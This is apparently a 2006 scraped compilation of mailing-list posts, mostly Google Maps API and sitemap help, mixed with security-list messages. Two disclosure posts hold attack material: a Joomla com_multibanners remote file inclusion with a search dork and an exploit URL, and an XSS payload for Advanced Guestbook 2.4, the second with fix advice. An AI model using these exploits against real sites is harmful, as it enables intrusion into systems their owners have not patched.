The "good" backlink is only good if the page where the link is placed
is good and indexed properly itself and the link is recognized as
relevant.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "google-sitemaps" group.
To post to this group, send email to google-sitemaps@googlegroups.com
To unsubscribe from this group, send email to google-sitemaps-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/google-sitemaps
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on 22-Jul-2006 at 11:02 PM.

I have done 2 sitemaps, one .txt and one .xml and my indexing has
decreased from 20 pages to 3 pages. One of the pages G consistantly
indexes does not exist. I have done a redirect in .htaccess to a page
that does exist. I have a good, strong site that I have spent a lot of
time optimizing and I don't understand why G won't index more of my
pages. Please help. Dot.

http://www.visualtransformation.com

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "google-sitemaps" group.
To post to this group, send email to google-sitemaps@googlegroups.com
To unsubscribe from this group, send email to google-sitemaps-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/google-sitemaps
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 11:01 PM.

> Recall that the important end of the equipment that does the
> controlling _is on the plane_, as are the hijackers.

This is actually one of the easiest issues to address; all you need to
do is make sure that it cannot be reached other than from outside the
plane's skin without provoking major structural failure of the plane's
body.

That said, I think this is a stupid idea.

> And would especially ruthless hijackers with, say, one of the new
> "super-jumbo" A380 planes with 500+ hostages not simply start killing
> hostages until the remote navigational override was turned off?
> Whose government would actually NOT succumb to such a threat?

I actually suspect that King George's might not. They'd likely spin it
as casualties in the War On Terror - unfortunate, but that's War.

If they *did* hold out, it would immensely strengthen their position
wrt a potential repeat. The surest way to prevent blackmail is to
demonstrate that you refuse to be blackmailed.

/~\ The ASCII der Mouse
\ / Ribbon Campaign
X Against HTML mouse@rodents.montreal.qc.ca
/ \ Email! 7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

0 Comments Published by Search on at 10:38 PM.

Rules of the Group!
---------------------------------------
1. All Adult and sensitive material mails should have one and only one tag and that is (Careful) ie word Careful in small brackets
2. No member of the group should forward SPAM or Advertisement emails.
3. No offese should be made to any member in terms of sex, cast, creed or relegion.
4. Use of abbusive words is strictly not allowed.
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 10:34 PM.

Darwin, yes please e-mail parts 1-9 directly

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "The Digital Exchange" group. To unsubscribe from this group, send email to thedigitalexchange-unsubscribe@googlegroups.com
For more options, visit our homepage at http://digitalexchange.myvnc.com
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 9:05 PM.

I definetly got 610. But I used a regular key this time by registering.
Now I has a page with URL something like http://localhost/xyz/. I got
an alert saying the key is already being in use when I use the build
and debug on VS 2005.

But just to try I now used the URL straight from firefox and it works.
Then I tried with IE that worked too. Looks like something is getting
cached on my IDE.

Any way all seems to be working now. I did not have to change any code.
Looks like I need a good API Key when geocoding.

Thanks a lot for helping me out.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 8:22 PM.

Yahoo has somehting. You make a list of url's in a .txt file, one url
per line, that same as the Google text sitemap, under the name
urllist.txt and submit that.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "google-sitemaps" group.
To post to this group, send email to google-sitemaps@googlegroups.com
To unsubscribe from this group, send email to google-sitemaps-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/google-sitemaps
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 8:18 PM.

Right on! Thanks.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 6:39 PM.

In any map software? Yes, Google Earth has quite an advanced handling
of lines in the paid versions. Fx has exactly the pencil tool your
asked for.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 5:48 PM.

In any map software? Yes, Google Earth has quite an advanced handling
of lines in the paid versions. Fx has exactly the pencil tool your
asked for.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 5:47 PM.

joekid wrote:
> Hi Guys
> I don't Understand how to add the site map Generator to my site all the
> codes it go's in .So I really need some help on Installing the google
> site map Generator on my site server. were can I find some one to do
> this for me I will pay for your work. my server has the Python2. and
> can you tell me if Google Site Map Generator Can read flash pages? I
> have a few Flash Page on my site. If any of the members wants to help
> me please contact me and let me know how much it will cost me. you can
> contact me at
> ron.paulk@gmail.com
>
> Thank you
> Joekid

What's the site url? if it's from your profile it looks like you are
blocking some bots like Xenu.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "google-sitemaps" group.
To post to this group, send email to google-sitemaps@googlegroups.com
To unsubscribe from this group, send email to google-sitemaps-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/google-sitemaps
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 5:18 PM.

miklos,

It can be done easily with the distance method.

I used this in a dragable circle thing:

http://www.admaps.com/dragpoly.htm

-John

http://maps.huge.info

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 5:09 PM.

السلام عليكم

نحيطكم علما باننا نحن المحترفون قد
قمنا باعادة انشاء المنتدى بحله جديده
واحتراف تعودتم عليه

نتمنى منكم الزياره وتشريفنا بطلتكم
البهيه

ودمتم بخبر

http://www.mo7trefon.com/vb

--~--~---------~--~----~------------~-------~--~----~
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 4:40 PM.

Why not use a 3rd party sitemap generator then?
( http://code.google.com/sm_thirdparty.html )
However, most, including mine, can not read Flash stuff though...

best regards
Thomas Schulz / A1 Sitemap Generator
http://www.micro-sys.dk/products/sitemap-generator/

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "google-sitemaps" group.
To post to this group, send email to google-sitemaps@googlegroups.com
To unsubscribe from this group, send email to google-sitemaps-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/google-sitemaps
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 4:26 PM.

Kw,

How about posting a link?

-John

http://maps.huge.info

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 3:19 PM.

Cheers, that helped me a lot, thank you!

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 3:07 PM.

Possibly. When geocoding you have 50000 goes per day, but these are
50000 *evenly-spaced* goes per day, so you need to allow at least 1.728
seconds between each one. If you just did 260 all in one go without any
delay between them you could have fallen foul of the policy. But I
think I would have expected a 620 error, and only then if you keep on
doing it.

Andrew

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 3:03 PM.

The last sentence in this snippet is perhaps the most interesting.
What about a hacker on the ground?

[snip]

Some 30 European businesses and research institutes are working to
create software that would make it possible from a distance to regain
control of an aircraft from hijackers, according to the German news
magazine.

The system "which could only be controlled from the ground would
conduct the aircraft posing a problem to the nearest airport whether it
liked it or not," according to extracts from next Monday's Der Spiegel
released Saturday.

"A hijacker would have no chance of reaching his goal," it said.

The project costs 36 million euros (45 million dollars), of which the
European Commission is contributing 19.5 million euros, and involves
aircraft maker Airbus, electronics giant Siemens and the Technical
University of Munich.

The first results should be presented in Britain in October, the
magazine said.

The system would be designed in such a way that even a computer hacker
on board could not get round it.

[snip]

More:
http://news.yahoo.com/s/afp/20060722/tc_afp/germanyeuunrest

- ferg

--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawg(at)netzero.net
ferg's tech blog: http://fergdawg.blogspot.com/

_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

0 Comments Published by Search on at 2:57 PM.

Hi Aztec,
I have an application that tracks kangaroos and koalas using PHP and
MYSQL that sounds like what you want. The locations are currently added
through some data entry screens but will shortly be available in
real-time via a VHF radio link. I have it plotting tracks and home
ranges (using minimum convex polygons) and topographic map overlays in
areas of interest. I am happy to share pieces of this code with you. It
is a small part of a much larger application so it wont be much value
sending you the whole thing. Send me an email offline if you want to
see it up and running.
Regards
Peter

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 2:39 PM.

Yeah I did 610 code corresponds with poblems with key.I reverted back
to v2. All the readings point to the fact that key check is skipped
when the url starts with file:// for v2.

Whats bothering me is why it stopped working suddenly. My XML file for
geocoding had around 260 entries. Did Google Maps ban me from using it
because of the volume of Geocoding within a given time?

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 2:38 PM.

Yeah I did 610 code corresponds with poblems with key.I reverted back
to v2. All the readings point to the fact that key check is skipped
when the url starts with file:// for v2.

Whats bothering me is why it stopped working suddenly. My XML file for
geocoding had around 260 entries. Did Google Maps ban me from using it
because of the volume of Geocoding within a given time?

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 2:37 PM.

I'm looking for a resource that maps Microsoft Security Bulletin numbers (such as MS06-033) to Microsoft Knowledge Base numbers (such as KB 917283). I recognize that this may be a one to many mapping since a single SB may point to a set of possible patches depending on OS version or application version.

While this utility <http://www.nirsoft.net/utils/wul.html> can determine what hotfixes and patches have been applied to a given machine and displays the relevant KB number, for many folks the reference they more easily remember is to the Security Bulletin number and not the KB number.

For example, if you want to map Microsoft Security Bulletin numbers to CVE numbers you can look at:

<http://cve.mitre.org/cve/refs/refmap/source-MS.html>

or if you want to map Microsoft KB numbers to CVE numbers you can look at:

<http://cve.mitre.org/cve/refs/refmap/source-MSKB.html>

----------
---Matthew

0 Comments Published by Search on at 1:56 PM.

They have different url's so they are like different sites. But
eventually a bot will figure out that there are 2 identical sites and
stop crawling and indexing one of them as it's a duplicate.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "google-sitemaps" group.
To post to this group, send email to google-sitemaps@googlegroups.com
To unsubscribe from this group, send email to google-sitemaps-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/google-sitemaps
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 1:31 PM.

#############################SolpotCrew Community################################

#

# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)

#

# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt

#

#################################################################################

#

#

# Bug Found By :Blue|Spy

#

# contact: mail@blue-spy.net

#

# Website : http://kunamgede.biz, http://blue-spy.net

#

################################################################################

#

#

# Greetz: h4ntu , Fungky, Solpot, Matdhule

# and all crew #mardongan @ irc.dal.net

#

#

###############################################################################

code from extadminmenus.class.php

if (phpversion() < '4.2.0') {

require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' );

}

if (phpversion() < '4.3.0') {

require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' );

}

Dork:

inurl:com_multibanners

exploit:

http://site.com/[path]//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[attacker]

##############################MY LOVE JUST FOR U LIENA#########################

########################################################################

0 Comments Published by Search on at 1:20 PM.

Okay. So I think I figured out why ... but how to fix.

When the pages posts back it fires the javascript load() function which
initiates the map to the default location. Is there javascript way to
do this (in asp.net):

Sub Page_Load(sender as Object, e as EventArgs)
If Not Page.IsPostBack then
...
End If
End Sub

So that I can avoid running some code in the load() function if it's a
postback?

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 1:17 PM.

Hi, thank you for reporting this problem. I am Paul, the author of the software, so I would like to do everything possible to correct this issue. The free version of my software is not open source, and not that the encryption is protecting it very well, I'm sure a good hacker could crack the encryption, but the point is to not let the security features be readable to everyone, so hopefully it will lessen problems like this.

Ok, so with that said, I tested the classic 'or 1=1 on my demo store, and nothing was returned. It said no matching results, so are you sure this worked for you ? I know I am not perfect in any way so I will always look in to this stuff, but when I first read your post I was confused because I attacked my own site for hours checking for that exact kind of attack.

I don't like to publicly post too much info about how and why I set things up, as to not give anyone any ideas on how to attack my software, but the search feature (I thought) would not be attackable. Now since you did it already, I may be wrong, but I do not use the keywords inside the sql statement. For example, I do not use anything like: select * from products where name = 'userinputvariable'. I have some security functions set up to clean user input, if you know the software, its afc_secure_string_POST. In the search script, I use that function for all input EXCEPT the keywords, but that is because the keywords are not used at all in sql statements (actually none of the input is). Basically, I break the keywords down in to separate words (explode by spaces), then I do my own sql select statements (without any user input at all) and simply check to see if the words match. There is more to my search than that, but for this topic that is all that matters. So if someone were
to type in any sql injection code, that code would never be queried. Your 'or 1=1 would simply be stored in an array, in your example it would consider it 2 different words (if you didn't use the space it would be one keyword), but the only time that word would be used is in a substr_count statement, which can not do any damage. If this problem does exist, please report back what i am missing from your comment, but since it did not work for me just now, and also since the keywords never hit an sql statement, at this point I will disagree with you. Also make sure you did this on my current demo store, which uses version 2.5. I know that version 1 sucked as far as validation was concerned. I first released the code just to see if anyone would use it, so it was done quickly, but after I had a small following, I added a whole bunch of security features in version 2, and validated EVERYTHING (I hope). Feel free to mess with my demo store, http://crinicart.com , just please do no
t attack my server or do any damage. As for now, I see your comments as helping the project find holes, which is great, I do want it to be perfect. So if you find something I will be more than willing to listen, just please do not do any damage to prove a point. Its not necessary since I will try out anything that comes up.

Your second point about the reviews, I am about to test that now. With this, you are probably correct. I had more validation in there, but people complain when I did that because they couldn't add html. I though text only was fine, but I wanted to make people happy. I am probably going to take out all < and > symbols. It does check for normal php tags, but I guess someone could still use a script html tag for php attacks. So since it currently allows html I agree someone could deface the site, but only when reading the attacked review, and since most users do not use that feature, I didn't see it as a big deal. Also, the review is escaped with mysql_real_escape_string and a few other things. the only way this could be perfect is to strip all html tags, and that was already in my mind to do.

I'd like to hear what you think, as well as, anyone else with an opinion about your comments (and mine). If a problem is found, it will be fixed the next day, but its tough to be the only developer of software used by many people because I get all kinds of developers telling me something is written poorly just to feel better about themselves. You sound like you know what you are talking about, so I took your comments seriously. If you are correct, like I said I will fix it and thank you. If you are not, I would like to clear it up so my users do not become scared, or hurt my creditibility.

Thank you,

Paul Crinigan

0 Comments Published by Search on at 12:46 PM.

No, but I laughed because you are right. I hadn't thought of that.

If anyone has any doubts about whether I'm using the right email
address, I'll be glad to send you a signed messaged with my PGP or
Verisign digital ID, or you can call me. I work for InfoWorld, so you
can email me there as well, roger_grimes@infoworld.com.

I assure you I already have the plaintext equivalents.

Roger

-----Original Message-----
From: Michael Scheidell [mailto:scheidell@secnap.net]
Sent: Tuesday, July 18, 2006 7:58 PM
To: Roger A. Grimes; bugtraq@securityfocus.com
Subject: RE: $100 plus several of my books if you can crack my Windows
password hashes.

You probably are who you say you are, and you probably own the accounts
these passwords are from, but could not someone post a bunch of NTLM
hashes and ask the world to crack them for him? Even if he dint' own the
accounts?

So, is this a social engineering test as well?

0 Comments Published by Search on at 12:00 PM.

you right, I feel so stupid!
Sometimes I had a so stupid mistakes that I can't understand how I ca
do them!

now it works good, thanks for your help :)

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 11:39 AM.

I know what XSS is. I'm pointing out the fact that to do any of the
XSS items in the report given, you have to be admin (since they are
all in the admin panel). If you are in the admin panel of any forum,
then there's other things you can do than try fiddle about with XSS.

Jessica

On 7/19/06, David Thomson <dave@enfinityhost.com> wrote:
> Defenition from Google, on XSS.
>
> Cross site scripting (XSS) is a type of computer security exploit where
> information from one context, where it is not trusted, can be inserted into
> another context, where it is. From the trusted context, an attack can be
> launched. Note that although cross site scripting is also sometimes
> abbreviated "CSS", it has nothing to do with the Cascading Style Sheets
> technology that is more commonly called CSS.
>
> Example:
>
> A XSS attack is something that an attacker performs, not an admin. You can
> use XSS to retrieve session information, cookies, md5 hashs, password hashes
> all from within a web browser, no need to be an admin.
>
> Hope this helps.
>

0 Comments Published by Search on at 11:17 AM.

There is a website I've done and there are 5 pages that are still not
indexed . . . exactly those that are the most important. I guess it
needs some time.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "google-sitemaps" group.
To post to this group, send email to google-sitemaps@googlegroups.com
To unsubscribe from this group, send email to google-sitemaps-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/google-sitemaps
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 10:55 AM.

i was recommended to do this for the color codes but am not to sure.

Try using a master array with key values to track your markers. Here's
some psuedo-code to illustrate what I'm talking about:

var markersArray = [];
var marker = new GMarker(new GPoint(lat, lng));
markersArray[lat+lng] = marker;

Then each time before you add the marker to the map, check your array
to see if there are any markers already using that key value; if so,
then remove that particular marker and add a new one in its place that
has a different GIcon, something like:

if (markersArray[lat+lng] != "undefined")
{
// code to handle multiple markers at one site

} else {

// code to place single marker

}

This is a very rough idea, but you should be able to develop it into
something that works.

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 10:46 AM.

There's several things going on here:

1. GOverlay itself doesn't throw events. What you have to do is use
addDomListener on its div, like this:

GEvent.addDomListener(rect.div_,"mouseover",function(){

2. However, you can't do that until after the GOverlay has been
initialized with a div, which doesn't happen until the addOverlay has
been performed, so perform
map.addOverlay(rect);
before setting up the addDomListener.

3. Your "event" variable is undefined. You might want to write

GEvent.addDomListener(rect.div_,"mouseover",function(event){

4. The structure of an Event() object is browser specific. In Firefox it
doesn't have .offsetX and .offsetY properties. It does have .pageX
and .pageY properties, but those values are relative to the top left
corner of the page, not relative to the top left corner of the map
div, so you'd have to subtract the position of the map div from those
values before you can convert it to a GLatLng.

MSIE does have .offsetX and .offsetY properties, but those values are
relative to the rect, not relative to the map div, so you'd have to
add the pixel position of the rect relative to the map div before
converting to a GLatLng.

Do you actually need the GLatLng position of the pointer? The fact that
you've got a mouseover event tells you that the mouse is over the rect.
There's no reason to perform those bounds checks. In fact, most of the
time those bounds checks aren't going to work anyway, because the
"mouseover" event is triggered at the outside edge of the relevant pixel
and most of the time the latitude and longitudes of the bounds are a
fraction of a pixel inside that. (The *first* mouseover event for each
rect is triggered well inside the bounds, because the mouse is inside
the rectangle when the rectangle is created.)

If you do need the GLatLng position of the pointer as it enters the
rectangle, you can do this outside the function, to continuously capture
the last known mouse position

var lastMousePos;
GEvent.addListener(map, "mousemove", function(a) {
lastMousePos = a;
});

Then inside your event handler you can write
var latLng=lastMousePos;

--
Google Map API Tutorial
http://www.econym.demon.co.uk/googlemaps/

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 10:34 AM.

[MajorSecurity #25] Advanced Guestbook 2.4 for phpBB - Multiple XSS and SQL-Injection Vulnerabilities

----------------------------------------------------------------------------------------

Software: Advanced Guestbook for phpBB

Version: 2.4

Type: Cross site scripting + SQL Injection

Made public: July, 22th 2006

Author: Dreamy and Kooky

Page: http://www.phpbbhacks.com/viewhack.php?id=966

Credits:

----------------------------------------------

Discovered by: David Vieira-Kurz

http://www.majorsecurity.de

Original Advisory:

----------------------------------------------

http://www.majorsecurity.de/advisory/major_rls25.txt

Affected Products:

----------------------------------------------

Advanced Guestbook for phpBB 2.4

Description:

----------------------------------------------

Advanced Guestbook is a PHP-based guestbook script.

It includes many useful features such as preview, templates, e-mail notification, picture upload, page spanning ,

html tags handling, smilies, advanced guestbook codes and language support.

The admin script lets you modify, view, and delete messages. Requires PHP4 and MySQL.

Requirements:

----------------------------------------------

register_globals = On

Vulnerabilities:

----------------------------------------------

XSS:

Input passed directly to the "entry" parameter in "guestbook.php" is not properly sanitised before being returned to the user.

This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

It works with a script code like this:

>"><script%20%0a%0d>alert(123456789)%3B</script>

SQL Injection:

Input passed directly to the "entry" parameter in "guestbook.php" is not properly sanitised before being used in a SQL query.

This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:

----------------------------------------------

Edit the source code to ensure that input is properly sanitised.

You should work with "htmlspecialchars()" or "htmlentities()" php-function to ensure that html tags

are not going to be executed. You should also work with the "intval()" php-function to ensure that the input

is numeric.

Example:

<?php

$pass = htmlentities($_POST['pass']);

echo htmlspecialchars("<script");

$id = intval($_POST['id']);

?>

Set "register_globals" to "Off".

0 Comments Published by Search on at 10:26 AM.

maps.huge.info wrote:
> Omar,
>
> You left out the event handler:
>
> GEvent.addListener(marker, "click", function()
> {
> marker.openInfoWindowHtml(html);
> });
>
> or something to that effect. Have you seen Mike Williams Tutorials?
> Search this group for the link. Well worth the effort to read them.
>
> -John
>
> http://maps.huge.info

I think I have it here:

function createMarker3(tmp){
alert(tmp.getText() + '\n' + tmp.getAddr());
new GLatLng(geocoder.getLatLng(
tmp.getAddr(),
function(point){
tmp = new GMarker(point, {title: tmp.getText()});
GEvent.addListener(tmp, "click", function() {
window.setTimeout(function() {
var lat = point.lat();
var lng = point.lng();
var center = new GLatLng((lat+vDelay), lng);
map.panTo(center);
}, 1000);
tmp.openInfoWindowHtml('<b>'+tmp.getText()+'</b>');
});
map.addOverlay(tmp);
}));
}

or am I wrong?

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 10:25 AM.

No - it is also vulnerable to this issue, B1 and B2.

-----Original Message-----
From: kala_z@hotmail.com [mailto:kala_z@hotmail.com]
Sent: Saturday, July 22, 2006 4:28 AM
To: bugtraq@securityfocus.com
Subject: Re: [EEYEB-20060227] D-Link Router UPNP Stack Overflow

What about D-Link DI-524 Rev. B2? Is it vulnerable too? has it been fixed
for this model?

0 Comments Published by Search on at 10:18 AM.

Hello,

I would like to be able to type in Houston, TX on maps.google.com. On
the resulting map, I can zoom in and out using the slide bar. I want to
be able to zoom in to any level and then click on a button to plot
locations say all wendy's in the zoomed area from my database. To do
that, I would need the latitude and longitude of the center of that
zoomed area without needing to click on the actual map.

Is this possible?

Thanks

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---

0 Comments Published by Search on at 10:12 AM.

On 7/11/06, Sheryl Coppenger <gubydala@his.com> wrote:
> Crispin Cowan wrote:
> > Gezim Hoxha wrote:
> >> 1.) If I have to write PHP, how do I write secure PHP? Give me a number
> >> of ensures that I can follow and check-mark each and live a happy
> >> life--for the most part.
> >>
> > Program defensively:
> [snip]
> > Test your system:
> [snip]
>
> > Wrap it in AppArmor http://en.opensuse.org/AppArmor for when you screw
> > up ^W^W don't do all the above perfectly.
>
> But that's only available if you're using Suse, right? What about
> hardened PHP, modsecurity, putting Apache in a chroot jail, that sort of
> thing?
>

Yeah, this is an important one. Use security on multiple levels.
Code your stuff so it's invulnerable, but make it so even if it isn't,
the site doesn't collapse. Put your administrative settings in a
different database, with different permissions, to your user stuff -
if possible using the administrator's password as the (my|pg)SQL user
password, so sql injections don't kill the site, just userland data.
Don't have write access where it's unnecessary, or read for that
matter: set permissions properly. Store SQL connections strings and
other sensitive information in a file to be require_once()d from
outside the web-accessible directory, just in case php suddenly
becomes uninstalled. Use php_flag and php_value in .htaccess, in case
your host changes php.ini without telling you. Code so you don't rely
on anything within php.ini. Initialise all variables before you use
them, access user input all within the $_GET, $_POST, $_COOKIE, $_FILE
superglobals.

Also configure your system properly. Keep up to date! Use hardened
php, modsecurity and apache in a jail for a start. Give your php user
limited access only to those files it needs access to. And then it
goes lower - secure your kernel. use ACLs.

The key point here? There are more entranceways to your server than
you think. Block them all. Secure your system in every place
possible. Use encryption. Never, ever, ever rely on a user, or
administrator, for security - have everything coded securely. A good
administrator will keep it that way and add their own restrictions...
but a bad one might not. Also don't be slack once you get into the
admin area. just because it's only meant to be accessed by someone
with a vested interest in the site, that doesn't mean that's how it'll
happen. Some stupid admin will use "d34db33f" as a password and think
they're funny - don't let this compromise the site. And at all costs,
for the sake of humanity, make it so a site compromise can't turn your
server upside down, can't make your server a spamer, and can't modify
anything on the server other than that specific site.

And that is my rant for today.

Michael

--
http://mine.mjec.net/

0 Comments Published by Search on at 10:06 AM.

It's possible to manage markers in a way that permit them to be placed
on the same overlay?
I'd like to show them all, or hide them all, just clicking a menu, or
anything else that I like.
And, it's also possible to assign to each marker its own infowindows
also if they are one overlay?

Thanks,
Omar

--~--~---------~--~----~------------~-------~--~----~
You received this message because you are subscribed to the Google Groups "Google Maps API" group.
To post to this group, send email to Google-Maps-API@googlegroups.com
To unsubscribe from this group, send email to Google-Maps-API-unsubscribe@googlegroups.com
For more options, visit this group at http://groups.google.com/group/Google-Maps-API
-~----------~----~----~----~------~----~------~--~---